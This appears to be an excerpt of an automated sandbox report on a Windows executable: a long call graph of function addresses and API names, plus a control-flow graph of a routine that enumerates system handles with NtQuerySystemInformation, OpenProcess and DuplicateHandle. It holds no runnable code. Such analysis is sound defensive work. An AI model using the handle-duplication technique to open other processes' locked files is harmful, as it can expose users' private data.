39256->39258 39457 416935 16 API calls 39257->39457 39458 43302c memset 39258->39458 39260 4445fa 39459 43302c memset 39260->39459 39263 444609 39263->39273 39460 416935 16 API calls 39263->39460 39265 444646 39461 434d4b 17 API calls 39265->39461 39267 44464d 39462 437655 16 API calls 39267->39462 39269 444653 39463 4442e6 11 API calls 39269->39463 39271 44465d 39271->39273 39464 416935 16 API calls 39271->39464 39465 4442e6 11 API calls 39273->39465 39504 438460 39274->39504 39276 40b8a4 39276->38699 39280 4251c4 39276->39280 39278 409a74 GetTempFileNameW 39277->39278 39279 409a66 GetWindowsDirectoryW 39277->39279 39278->38686 39279->39278 39601 424f07 11 API calls 39280->39601 39282 4251e4 39283 4251f7 39282->39283 39284 4251e8 39282->39284 39603 4250f8 39283->39603 39602 4446ea 11 API calls 39284->39602 39286 4251f2 39286->38724 39288 425209 39291 425249 39288->39291 39294 4250f8 126 API calls 39288->39294 39295 425287 39288->39295 39611 4384e9 134 API calls 39288->39611 39612 424f74 123 API calls 39288->39612 39291->39295 39613 424ff0 13 API calls 39291->39613 39294->39288 39615 415c7d 16 API calls 39295->39615 39296 425266 39296->39295 39614 415be9 memcpy 39296->39614 39298->38724 39299->38724 39300->38724 39301->38724 39302->38724 39303->38724 39304->38724 39305->38724 39306->38724 39307->38699 39308->38692 39309->38721 39342 4096c3 CreateFileW 39310->39342 39312 40cc34 39313 40cc3d GetFileSize 39312->39313 39314 40bbca 39312->39314 39315 40afcf 2 API calls 39313->39315 39314->39198 39322 40cf04 39314->39322 39316 40cc64 39315->39316 39343 40a2ef ReadFile 39316->39343 39318 40cc71 39344 40ab4a MultiByteToWideChar 39318->39344 39320 40cc95 CloseHandle 39321 40b04b ??3@YAXPAX 39320->39321 39321->39314 39323 40b633 free 39322->39323 39324 40cf14 39323->39324 39350 40b1ab free free 39324->39350 39326 40bbdd 39326->39198 39326->39203 39327 40cf1b 39327->39326 39329 40cfef 39327->39329 39351 40cd4b 39327->39351 39330 40cd4b 14 API calls 39329->39330 39330->39326 39332 40b633 free 39331->39332 39333 40cc15 39332->39333 39334 40aa04 free 39333->39334 39335 40cc1d 39334->39335 39400 40b1ab free free 39335->39400 39337 40b7d4 memset CreateFileW 39337->38679 39337->38680 39338->39206 39339->39208 39340->39216 39341->39219 39342->39312 39343->39318 39345 40ab6b 39344->39345 39349 40ab93 39344->39349 39346 40a9ce 4 API calls 39345->39346 39347 40ab74 39346->39347 39348 40ab7c MultiByteToWideChar 39347->39348 39348->39349 39349->39320 39350->39327 39352 40cd7b 39351->39352 39385 40aa29 39352->39385 39354 40cef5 39355 40aa04 free 39354->39355 39356 40cefd 39355->39356 39356->39327 39358 40aa29 6 API calls 39359 40ce1d 39358->39359 39360 40aa29 6 API calls 39359->39360 39361 40ce3e 39360->39361 39362 40ce6a 39361->39362 39393 40abb7 wcslen memmove 39361->39393 39363 40ce9f 39362->39363 39396 40abb7 wcslen memmove 39362->39396 39366 40a8d0 7 API calls 39363->39366 39369 40ceb5 39366->39369 39367 40ce56 39394 40aa71 wcslen 39367->39394 39368 40ce8b 39397 40aa71 wcslen 39368->39397 39375 40a8d0 7 API calls 39369->39375 39372 40ce5e 39395 40abb7 wcslen memmove 39372->39395 39373 40ce93 39398 40abb7 wcslen memmove 39373->39398 39377 40cecb 39375->39377 39399 40d00b malloc memcpy free free 39377->39399 39379 40cedd 39380 40aa04 free 39379->39380 39381 40cee5 39380->39381 39382 40aa04 free 39381->39382 39383 40ceed 39382->39383 39384 40aa04 free 39383->39384 39384->39354 39386 40aa33 39385->39386 39392 40aa63 39385->39392 39387 40aa44 39386->39387 39388 40aa38 wcslen 39386->39388 39389 40a9ce malloc memcpy free free 39387->39389 39388->39387 39390 40aa4d 39389->39390 39391 40aa51 memcpy 39390->39391 39390->39392 39391->39392 39392->39354 39392->39358 39393->39367 39394->39372 39395->39362 39396->39368 39397->39373 39398->39363 39399->39379 39400->39337 39402 4438d0 39401->39402 39412 4438c9 39401->39412 39467 415378 memcpy memcpy 39402->39467 39412->39230 39416 415a77 39415->39416 39417 415a8d 39416->39417 39418 415a7e memset 39416->39418 39417->39234 39418->39417 39420 4438b5 11 API calls 39419->39420 39421 41525d 39420->39421 39421->39239 39423 444328 39422->39423 39424 444423 39423->39424 39425 44434e 39423->39425 39470 4446ea 11 API calls 39424->39470 39426 432d4e 3 API calls 39425->39426 39428 44435a 39426->39428 39430 444375 39428->39430 39435 44438b 39428->39435 39429 432d4e 3 API calls 39431 4443ec 39429->39431 39468 416935 16 API calls 39430->39468 39433 444381 39431->39433 39469 416935 16 API calls 39431->39469 39433->39245 39435->39429 39437 432d58 39436->39437 39439 432d65 39436->39439 39471 432cc4 memset memset memcpy 39437->39471 39439->39253 39441 41eee2 39440->39441 39442 415a6d memset 39441->39442 39443 41ef23 39442->39443 39444 415a6d memset 39443->39444 39455 41ef2d 39443->39455 39445 41ef42 39444->39445 39449 41ef49 39445->39449 39472 41b7d9 39445->39472 39447 41ef66 39448 41ef74 memset 39447->39448 39447->39449 39450 41ef91 39448->39450 39453 41ef9e 39448->39453 39449->39455 39490 41b321 100 API calls 39449->39490 39486 41519d 39450->39486 39453->39449 39489 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39453->39489 39455->39256 39456->39273 39457->39273 39458->39260 39459->39263 39460->39265 39461->39267 39462->39269 39463->39271 39464->39273 39465->39235 39466->39231 39468->39433 39469->39433 39470->39433 39471->39439 39478 41b812 39472->39478 39473 415a6d memset 39474 41b8c2 39473->39474 39475 41b980 39474->39475 39476 41b902 memcpy memcpy memcpy memcpy memcpy 39474->39476 39481 41b849 39474->39481 39483 41b9ad 39475->39483 39492 4151e3 39475->39492 39476->39475 39478->39481 39485 41b884 39478->39485 39491 444706 11 API calls 39478->39491 39480 41ba12 39480->39481 39482 41ba32 memset 39480->39482 39481->39447 39482->39481 39483->39481 39495 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39483->39495 39485->39473 39485->39481 39496 4175ed 39486->39496 39489->39449 39490->39455 39491->39485 39494 41837f 54 API calls 39492->39494 39493 4151f9 39493->39483 39494->39493 39495->39480 39497 417570 SetFilePointer GetLastError GetLastError 39496->39497 39498 4175ff 39497->39498 39499 41760a ReadFile 39498->39499 39500 4151b3 39498->39500 39501 417637 39499->39501 39502 417627 GetLastError 39499->39502 39500->39453 39501->39500 39503 41763e memset 39501->39503 39502->39500 39503->39500 39516 41703f 39504->39516 39506 43847a 39507 43848a 39506->39507 39508 43847e 39506->39508 39523 438270 39507->39523 39553 4446ea 11 API calls 39508->39553 39513 4384bb 39514 438270 133 API calls 39513->39514 39515 438488 39514->39515 39515->39276 39517 417044 39516->39517 39518 41705c 39516->39518 39522 417055 39517->39522 39555 416760 11 API calls 39517->39555 39519 417075 39518->39519 39556 41707a 11 API calls 39518->39556 39519->39506 39522->39506 39557 415a91 39523->39557 39525 43828d 39526 438297 39525->39526 39527 438341 39525->39527 39529 4382d6 39525->39529 39600 415c7d 16 API calls 39526->39600 39561 44358f 39527->39561 39532 4382fb 39529->39532 39533 4382db 39529->39533 39531 438458 39531->39515 39554 424f26 122 API calls 39531->39554 39594 415c23 memcpy 39532->39594 39592 416935 16 API calls 39533->39592 39536 4382e9 39593 415c7d 16 API calls 39536->39593 39537 438305 39540 44358f 19 API calls 39537->39540 39542 438318 39537->39542 39539 438373 39546 438383 39539->39546 39595 4300e8 memset memset memcpy 39539->39595 39540->39542 39542->39539 39587 43819e 39542->39587 39544 4383f5 39549 438404 39544->39549 39550 43841c 39544->39550 39545 4383cd 39545->39544 39597 42453e 122 API calls 39545->39597 39546->39545 39596 415c23 memcpy 39546->39596 39598 416935 16 API calls 39549->39598 39599 416935 16 API calls 39550->39599 39553->39515 39554->39513 39555->39522 39556->39517 39558 415a9d 39557->39558 39559 415ab3 39558->39559 39560 415aa4 memset 39558->39560 39559->39525 39560->39559 39562 4435be 39561->39562 39563 443676 39562->39563 39566 4436ce 39562->39566 39569 442ff8 19 API calls 39562->39569 39571 44366c 39562->39571 39585 44360c 39562->39585 39564 443737 39563->39564 39567 442ff8 19 API calls 39563->39567 39570 443758 39563->39570 39568 442ff8 19 API calls 39564->39568 39565 441409 memset 39565->39570 39573 4165ff 11 API calls 39566->39573 39567->39564 39568->39570 39569->39562 39570->39565 39575 443775 39570->39575 39574 4169a7 11 API calls 39571->39574 39572 4437be 39576 416760 11 API calls 39572->39576 39577 4437de 39572->39577 39573->39563 39574->39563 39575->39572 39581 415c56 11 API calls 39575->39581 39576->39577 39578 42463b memset memcpy 39577->39578 39580 443801 39577->39580 39578->39580 39579 443826 39583 43bd08 memset 39579->39583 39580->39579 39582 43024d memset 39580->39582 39581->39572 39582->39579 39584 443837 39583->39584 39584->39585 39586 43024d memset 39584->39586 39585->39542 39586->39584 39588 438246 39587->39588 39590 4381ba 39587->39590 39588->39539 39589 41f432 109 API calls 39589->39590 39590->39588 39590->39589 39591 41f638 103 API calls 39590->39591 39591->39590 39592->39536 39593->39526 39594->39537 39595->39546 39596->39545 39597->39544 39598->39526 39599->39526 39600->39531 39601->39282 39602->39286 39604 425108 39603->39604 39610 42510d 39603->39610 39648 424f74 123 API calls 39604->39648 39607 42516e 39649 415c7d 16 API calls 39607->39649 39608 425115 39608->39288 39610->39608 39616 42569b 39610->39616 39611->39288 39612->39288 39613->39296 39614->39295 39615->39286 39627 4256f1 39616->39627 39644 4259c2 39616->39644 39621 4260dd 39661 424251 119 API calls 39621->39661 39622 429a4d 39629 429a66 39622->39629 39630 429a9b 39622->39630 39626 422aeb memset memcpy memcpy 39626->39627 39627->39622 39627->39626 39632 4260a1 39627->39632 39641 4259da 39627->39641 39642 429ac1 39627->39642 39627->39644 39647 425a38 39627->39647 39650 4227f0 memset memcpy 39627->39650 39651 422b84 15 API calls 39627->39651 39652 422b5d memset memcpy memcpy 39627->39652 39653 422640 13 API calls 39627->39653 39655 4241fc 11 API calls 39627->39655 39656 42413a 89 API calls 39627->39656 39662 415c56 11 API calls 39629->39662 39631 429a96 39630->39631 39664 416760 11 API calls 39630->39664 39665 424251 119 API calls 39631->39665 39659 415c56 11 API calls 39632->39659 39634 429a7a 39663 416760 11 API calls 39634->39663 39660 416760 11 API calls 39641->39660 39643 425ad6 39642->39643 39666 415c56 11 API calls 39642->39666 39643->39607 39644->39643 39654 415c56 11 API calls 39644->39654 39647->39644 39657 422640 13 API calls 39647->39657 39658 4226e0 12 API calls 39647->39658 39648->39610 39649->39608 39650->39627 39651->39627 39652->39627 39653->39627 39654->39641 39655->39627 39656->39627 39657->39647 39658->39647 39659->39641 39660->39621 39661->39643 39662->39634 39663->39631 39664->39631 39665->39642 39666->39641 39667->38759 39668->38767 39669 44dea5 39670 44deb5 FreeLibrary 39669->39670 39671 44dec3 39669->39671 39670->39671 39672 4147f3 39675 414561 39672->39675 39674 414813 39676 41456d 39675->39676 39677 41457f GetPrivateProfileIntW 39675->39677 39680 4143f1 memset _itow WritePrivateProfileStringW 39676->39680 39677->39674 39679 41457a 39679->39674 39680->39679 39681 44def7 39682 44df07 39681->39682 39683 44df00 ??3@YAXPAX 39681->39683 39684 44df17 39682->39684 39685 44df10 ??3@YAXPAX 39682->39685 39683->39682 39686 44df27 39684->39686 39687 44df20 ??3@YAXPAX 39684->39687 39685->39684 39688 44df37 39686->39688 39689 44df30 ??3@YAXPAX 39686->39689 39687->39686 39689->39688 39690 4287c1 39691 4287d2 39690->39691 39692 429ac1 39690->39692 39693 428818 39691->39693 39694 42881f 39691->39694 39709 425711 39691->39709 39704 425ad6 39692->39704 39760 415c56 11 API calls 39692->39760 39727 42013a 39693->39727 39755 420244 96 API calls 39694->39755 39698 4260dd 39754 424251 119 API calls 39698->39754 39702 4259da 39753 416760 11 API calls 39702->39753 39705 429a4d 39711 429a66 39705->39711 39712 429a9b 39705->39712 39708 422aeb memset memcpy memcpy 39708->39709 39709->39692 39709->39702 39709->39705 39709->39708 39714 4260a1 39709->39714 39723 4259c2 39709->39723 39726 425a38 39709->39726 39743 4227f0 memset memcpy 39709->39743 39744 422b84 15 API calls 39709->39744 39745 422b5d memset memcpy memcpy 39709->39745 39746 422640 13 API calls 39709->39746 39748 4241fc 11 API calls 39709->39748 39749 42413a 89 API calls 39709->39749 39756 415c56 11 API calls 39711->39756 39713 429a96 39712->39713 39758 416760 11 API calls 39712->39758 39759 424251 119 API calls 39713->39759 39752 415c56 11 API calls 39714->39752 39716 429a7a 39757 416760 11 API calls 39716->39757 39723->39704 39747 415c56 11 API calls 39723->39747 39726->39723 39750 422640 13 API calls 39726->39750 39751 4226e0 12 API calls 39726->39751 39728 42014c 39727->39728 39731 420151 39727->39731 39770 41e466 96 API calls 39728->39770 39730 420162 39730->39709 39731->39730 39732 4201b3 39731->39732 39733 420229 39731->39733 39734 4201b8 39732->39734 39735 4201dc 39732->39735 39733->39730 39736 41fd5e 85 API calls 39733->39736 39761 41fbdb 39734->39761 39735->39730 39740 4201ff 39735->39740 39767 41fc4c 39735->39767 39736->39730 39740->39730 39742 42013a 96 API calls 39740->39742 39742->39730 39743->39709 39744->39709 39745->39709 39746->39709 39747->39702 39748->39709 39749->39709 39750->39726 39751->39726 39752->39702 39753->39698 39754->39704 39755->39709 39756->39716 39757->39713 39758->39713 39759->39692 39760->39702 39762 41fbf8 39761->39762 39765 41fbf1 39761->39765 39775 41ee26 39762->39775 39766 41fc39 39765->39766 39785 4446ce 11 API calls 39765->39785 39766->39730 39771 41fd5e 39766->39771 39768 41ee6b 85 API calls 39767->39768 39769 41fc5d 39768->39769 39769->39735 39770->39731 39773 41fd65 39771->39773 39772 41fdab 39772->39730 39773->39772 39774 41fbdb 85 API calls 39773->39774 39774->39773 39776 41ee41 39775->39776 39777 41ee32 39775->39777 39786 41edad 39776->39786 39789 4446ce 11 API calls 39777->39789 39780 41ee3c 39780->39765 39783 41ee58 39783->39780 39791 41ee6b 39783->39791 39785->39766 39795 41be52 39786->39795 39789->39780 39790 41eb85 11 API calls 39790->39783 39792 41ee70 39791->39792 39793 41ee78 39791->39793 39833 41bf99 85 API calls 39792->39833 39793->39780 39796 41be6f 39795->39796 39797 41be5f 39795->39797 39802 41be8c 39796->39802 39827 418c63 memset memset 39796->39827 39826 4446ce 11 API calls 39797->39826 39799 41be69 39799->39780 39799->39790 39802->39799 39803 41bf3a 39802->39803 39804 41bed1 39802->39804 39807 41bee7 39802->39807 39830 4446ce 11 API calls 39803->39830 39806 41bef0 39804->39806 39809 41bee2 39804->39809 39806->39807 39808 41bf01 39806->39808 39807->39799 39831 41a453 85 API calls 39807->39831 39810 41bf24 memset 39808->39810 39812 41bf14 39808->39812 39828 418a6d memset memcpy memset 39808->39828 39816 41ac13 39809->39816 39810->39799 39829 41a223 memset memcpy memset 39812->39829 39815 41bf20 39815->39810 39817 41ac52 39816->39817 39818 41ac3f memset 39816->39818 39821 41ac6a 39817->39821 39832 41dc14 19 API calls 39817->39832 39819 41acd9 39818->39819 39819->39807 39822 41519d 6 API calls 39821->39822 39823 41aca1 39821->39823 39822->39823 39823->39819 39824 41acc0 memset 39823->39824 39825 41accd memcpy 39823->39825 39824->39819 39825->39819 39826->39799 39827->39802 39828->39812 39829->39815 39830->39807 39832->39821 39833->39793 39834 417bc5 39836 417c61 39834->39836 39839 417bda 39834->39839 39835 417bf6 UnmapViewOfFile CloseHandle 39835->39835 39835->39839 39838 417c2c 39838->39839 39846 41851e 18 API calls 39838->39846 39839->39835 39839->39836 39839->39838 39841 4175b7 39839->39841 39842 4175d6 CloseHandle 39841->39842 39843 4175c8 39842->39843 39844 4175df 39842->39844 39843->39844 39845 4175ce Sleep 39843->39845 39844->39839 39845->39842 39846->39838 39847 4148b6 FindResourceW 39848 4148cf SizeofResource 39847->39848 39851 4148f9 39847->39851 39849 4148e0 LoadResource 39848->39849 39848->39851 39850 4148ee LockResource 39849->39850 39849->39851 39850->39851 39852 441b3f 39862 43a9f6 39852->39862 39854 441b61 40035 4386af memset 39854->40035 39856 44189a 39857 4418e2 39856->39857 39859 442bd4 39856->39859 39858 4418ea 39857->39858 40036 4414a9 12 API calls 39857->40036 39859->39858 40037 441409 memset 39859->40037 39863 43aa20 39862->39863 39870 43aadf 39862->39870 39864 43aa34 memset 39863->39864 39863->39870 39865 43aa56 39864->39865 39866 43aa4d 39864->39866 40038 43a6e7 39865->40038 40046 42c02e memset 39866->40046 39870->39854 39872 43aad3 40048 4169a7 11 API calls 39872->40048 39873 43aaae 39873->39870 39873->39872 39888 43aae5 39873->39888 39874 43ac18 39877 43ac47 39874->39877 40050 42bbd5 memcpy memcpy memcpy memset memcpy 39874->40050 39878 43aca8 39877->39878 40051 438eed 16 API calls 39877->40051 39882 43acd5 39878->39882 40053 4233ae 11 API calls 39878->40053 39881 43ac87 40052 4233c5 16 API calls 39881->40052 40054 423426 11 API calls 39882->40054 39886 43ace1 40055 439811 162 API calls 39886->40055 39887 43a9f6 160 API calls 39887->39888 39888->39870 39888->39874 39888->39887 40049 439bbb 22 API calls 39888->40049 39890 43acfd 39895 43ad2c 39890->39895 40056 438eed 16 API calls 39890->40056 39892 43ad19 40057 4233c5 16 API calls 39892->40057 39894 43ad58 40058 44081d 162 API calls 39894->40058 39895->39894 39898 43add9 39895->39898 39898->39898 40062 423426 11 API calls 39898->40062 39899 43ae3a memset 39900 43ae73 39899->39900 40063 42e1c0 146 API calls 39900->40063 39901 43adab 40060 438c4e 162 API calls 39901->40060 39902 43ad6c 39902->39870 39902->39901 40059 42370b memset memcpy memset 39902->40059 39906 43adcc 40061 440f84 12 API calls 39906->40061 39907 43ae96 40064 42e1c0 146 API calls 39907->40064 39910 43aea8 39913 43aec1 39910->39913 40065 42e199 146 API calls 39910->40065 39912 43af00 39912->39870 39917 43af1a 39912->39917 39918 43b3d9 39912->39918 39913->39912 40066 42e1c0 146 API calls 39913->40066 39914 43add4 39919 43b60f 39914->39919 40125 438f86 16 API calls 39914->40125 40067 438eed 16 API calls 39917->40067 39923 43b3f6 39918->39923 39928 43b4c8 39918->39928 39919->39870 40126 4393a5 17 API calls 39919->40126 39922 43af2f 40068 4233c5 16 API calls 39922->40068 40108 432878 12 API calls 39923->40108 39925 43af51 40069 423426 11 API calls 39925->40069 39927 43b4f2 40115 43a76c 21 API calls 39927->40115 39928->39927 40114 42bbd5 memcpy memcpy memcpy memset memcpy 39928->40114 39930 43af7d 40070 423426 11 API calls 39930->40070 39934 43af94 40071 423330 11 API calls 39934->40071 39935 43b529 40116 44081d 162 API calls 39935->40116 39936 43b462 40110 423330 11 API calls 39936->40110 39940 43b544 39944 43b55c 39940->39944 40117 42c02e memset 39940->40117 39941 43b428 39941->39936 40109 432b60 16 API calls 39941->40109 39942 43afca 40072 423330 11 API calls 39942->40072 39943 43b47e 39946 43b497 39943->39946 40111 42374a memcpy memset memcpy memcpy memcpy 39943->40111 40118 43a87a 162 API calls 39944->40118 40112 4233ae 11 API calls 39946->40112 39949 43afdb 40073 4233ae 11 API calls 39949->40073 39952 43b4b1 40113 423399 11 API calls 39952->40113 39954 43b56c 39957 43b58a 39954->39957 40119 423330 11 API calls 39954->40119 39956 43afee 40074 44081d 162 API calls 39956->40074 40120 440f84 12 API calls 39957->40120 39958 43b4c1 40122 42db80 162 API calls 39958->40122 39963 43b592 40121 43a82f 16 API calls 39963->40121 39966 43b5b4 40123 438c4e 162 API calls 39966->40123 39968 43b5cf 40124 42c02e memset 39968->40124 39970 43b005 39970->39870 39975 43b01f 39970->39975 40075 42d836 162 API calls 39970->40075 39971 43b1ef 40085 4233c5 16 API calls 39971->40085 39973 43b212 40086 423330 11 API calls 39973->40086 39975->39971 40083 423330 11 API calls 39975->40083 40084 42d71d 162 API calls 39975->40084 39977 43b087 40076 4233ae 11 API calls 39977->40076 39980 43b22a 40087 42ccb5 11 API calls 39980->40087 39983 43b23f 40088 4233ae 11 API calls 39983->40088 39984 43b10f 40079 423330 11 API calls 39984->40079 39986 43b257 40089 4233ae 11 API calls 39986->40089 39990 43b129 40080 4233ae 11 API calls 39990->40080 39991 43b26e 40090 4233ae 11 API calls 39991->40090 39994 43b09a 39994->39984 40077 42cc15 19 API calls 39994->40077 40078 4233ae 11 API calls 39994->40078 39996 43b282 40091 43a87a 162 API calls 39996->40091 39997 43b13c 40081 440f84 12 API calls 39997->40081 39999 43b29d 40092 423330 11 API calls 39999->40092 40002 43b15f 40082 4233ae 11 API calls 40002->40082 40003 43b2af 40005 43b2b8 40003->40005 40006 43b2ce 40003->40006 40093 4233ae 11 API calls 40005->40093 40094 440f84 12 API calls 40006->40094 40009 43b2c9 40096 4233ae 11 API calls 40009->40096 40010 43b2da 40095 42370b memset memcpy memset 40010->40095 40013 43b2f9 40097 423330 11 API calls 40013->40097 40015 43b30b 40098 423330 11 API calls 40015->40098 40017 43b325 40099 423399 11 API calls 40017->40099 40019 43b332 40100 4233ae 11 API calls 40019->40100 40021 43b354 40101 423399 11 API calls 40021->40101 40023 43b364 40102 43a82f 16 API calls 40023->40102 40025 43b370 40103 42db80 162 API calls 40025->40103 40027 43b380 40104 438c4e 162 API calls 40027->40104 40029 43b39e 40105 423399 11 API calls 40029->40105 40031 43b3ae 40106 43a76c 21 API calls 40031->40106 40033 43b3c3 40107 423399 11 API calls 40033->40107 40035->39856 40036->39858 40037->39859 40039 43a6f5 40038->40039 40040 43a765 40038->40040 40039->40040 40127 42a115 40039->40127 40040->39870 40047 4397fd memset 40040->40047 40044 43a73d 40044->40040 40045 42a115 146 API calls 40044->40045 40045->40040 40046->39865 40047->39873 40048->39870 40049->39888 40050->39877 40051->39881 40052->39878 40053->39882 40054->39886 40055->39890 40056->39892 40057->39895 40058->39902 40059->39901 40060->39906 40061->39914 40062->39899 40063->39907 40064->39910 40065->39913 40066->39913 40067->39922 40068->39925 40069->39930 40070->39934 40071->39942 40072->39949 40073->39956 40074->39970 40075->39977 40076->39994 40077->39994 40078->39994 40079->39990 40080->39997 40081->40002 40082->39975 40083->39975 40084->39975 40085->39973 40086->39980 40087->39983 40088->39986 40089->39991 40090->39996 40091->39999 40092->40003 40093->40009 40094->40010 40095->40009 40096->40013 40097->40015 40098->40017 40099->40019 40100->40021 40101->40023 40102->40025 40103->40027 40104->40029 40105->40031 40106->40033 40107->39914 40108->39941 40109->39936 40110->39943 40111->39946 40112->39952 40113->39958 40114->39927 40115->39935 40116->39940 40117->39944 40118->39954 40119->39957 40120->39963 40121->39958 40122->39966 40123->39968 40124->39914 40125->39919 40126->39870 40128 42a175 40127->40128 40130 42a122 40127->40130 40128->40040 40133 42b13b 146 API calls 40128->40133 40130->40128 40131 42a115 146 API calls 40130->40131 40134 43a174 40130->40134 40158 42a0a8 146 API calls 40130->40158 40131->40130 40133->40044 40148 43a196 40134->40148 40149 43a19e 40134->40149 40135 43a306 40135->40148 40172 4388c4 14 API calls 40135->40172 40138 42a115 146 API calls 40138->40149 40139 415a91 memset 40139->40149 40140 43a642 40140->40148 40177 4169a7 11 API calls 40140->40177 40144 43a635 40176 42c02e memset 40144->40176 40148->40130 40149->40135 40149->40138 40149->40139 40149->40148 40159 42ff8c 40149->40159 40167 4165ff 11 API calls 40149->40167 40168 439504 13 API calls 40149->40168 40169 4312d0 146 API calls 40149->40169 40170 42be4c memcpy memcpy memcpy memset memcpy 40149->40170 40171 43a121 11 API calls 40149->40171 40151 42bf4c 14 API calls 40153 43a325 40151->40153 40152 4169a7 11 API calls 40152->40153 40153->40140 40153->40144 40153->40148 40153->40151 40153->40152 40154 42b5b5 memset memcpy 40153->40154 40173 42b63e 14 API calls 40153->40173 40174 4165ff 11 API calls 40153->40174 40175 42bfcf memcpy 40153->40175 40154->40153 40158->40130 40178 43817e 40159->40178 40161 42ff99 40162 42ffe3 40161->40162 40163 42ffd0 40161->40163 40166 42ff9d 40161->40166 40183 4169a7 11 API calls 40162->40183 40182 4169a7 11 API calls 40163->40182 40166->40149 40167->40149 40168->40149 40169->40149 40170->40149 40171->40149 40172->40153 40173->40153 40174->40153 40175->40153 40176->40140 40177->40148 40179 438187 40178->40179 40181 438192 40178->40181 40184 4380f6 40179->40184 40181->40161 40182->40166 40183->40166 40186 43811f 40184->40186 40185 438164 40185->40181 40186->40185 40189 437e5e 40186->40189 40212 4300e8 memset memset memcpy 40186->40212 40213 437d3c 40189->40213 40191 437ea9 40192 437eb3 40191->40192 40198 437f22 40191->40198 40228 41f432 40191->40228 40192->40186 40195 437f06 40239 415c56 11 API calls 40195->40239 40197 437f95 40240 415c56 11 API calls 40197->40240 40199 437f7f 40198->40199 40200 432d4e 3 API calls 40198->40200 40199->40197 40201 43802b 40199->40201 40200->40199 40241 4165ff 11 API calls 40201->40241 40204 438054 40242 437371 137 API calls 40204->40242 40207 43806b 40208 438094 40207->40208 40243 42f50e 137 API calls 40207->40243 40209 437fa3 40208->40209 40244 4300e8 memset memset memcpy 40208->40244 40209->40192 40245 41f638 103 API calls 40209->40245 40212->40186 40214 437d69 40213->40214 40217 437d80 40213->40217 40246 437ccb 11 API calls 40214->40246 40216 437d76 40216->40191 40217->40216 40218 437da3 40217->40218 40221 437d90 40217->40221 40220 438460 133 API calls 40218->40220 40224 437dcb 40220->40224 40221->40216 40250 437ccb 11 API calls 40221->40250 40222 437de8 40249 424f26 122 API calls 40222->40249 40224->40222 40247 444283 13 API calls 40224->40247 40226 437dfc 40248 437ccb 11 API calls 40226->40248 40229 41f54d 40228->40229 40235 41f44f 40228->40235 40230 41f466 40229->40230 40280 41c635 memset memset 40229->40280 40230->40195 40230->40198 40235->40230 40237 41f50b 40235->40237 40251 41f1a5 40235->40251 40276 41c06f memcmp 40235->40276 40277 41f3b1 89 API calls 40235->40277 40278 41f398 85 API calls 40235->40278 40237->40229 40237->40230 40279 41c295 85 API calls 40237->40279 40239->40192 40240->40209 40241->40204 40242->40207 40243->40208 40244->40209 40245->40192 40246->40216 40247->40226 40248->40222 40249->40216 40250->40216 40252 41bc3b 100 API calls 40251->40252 40253 41f1b4 40252->40253 40254 41edad 85 API calls 40253->40254 40261 41f282 40253->40261 40255 41f1cb 40254->40255 40256 41f1f5 memcmp 40255->40256 40257 41f20e 40255->40257 40255->40261 40256->40257 40258 41f21b memcmp 40257->40258 40257->40261 40259 41f326 40258->40259 40262 41f23d 40258->40262 40260 41ee6b 85 API calls 40259->40260 40259->40261 40260->40261 40261->40235 40262->40259 40263 41f28e memcmp 40262->40263 40265 41c8df 55 API calls 40262->40265 40263->40259 40264 41f2a9 40263->40264 40264->40259 40267 41f308 40264->40267 40268 41f2d8 40264->40268 40266 41f269 40265->40266 40266->40259 40269 41f287 40266->40269 40270 41f27a 40266->40270 40267->40259 40274 4446ce 11 API calls 40267->40274 40271 41ee6b 85 API calls 40268->40271 40269->40263 40272 41ee6b 85 API calls 40270->40272 40273 41f2e0 40271->40273 40272->40261 40275 41b1ca memset 40273->40275 40274->40259 40275->40261 40276->40235 40277->40235 40278->40235 40279->40229 40280->40230 40281 41493c EnumResourceNamesW 40282 44660a 40285 4465e4 40282->40285 40284 446613 40286 4465f3 __dllonexit 40285->40286 40287 4465ed _onexit 40285->40287 40286->40284 40287->40286

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                              • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
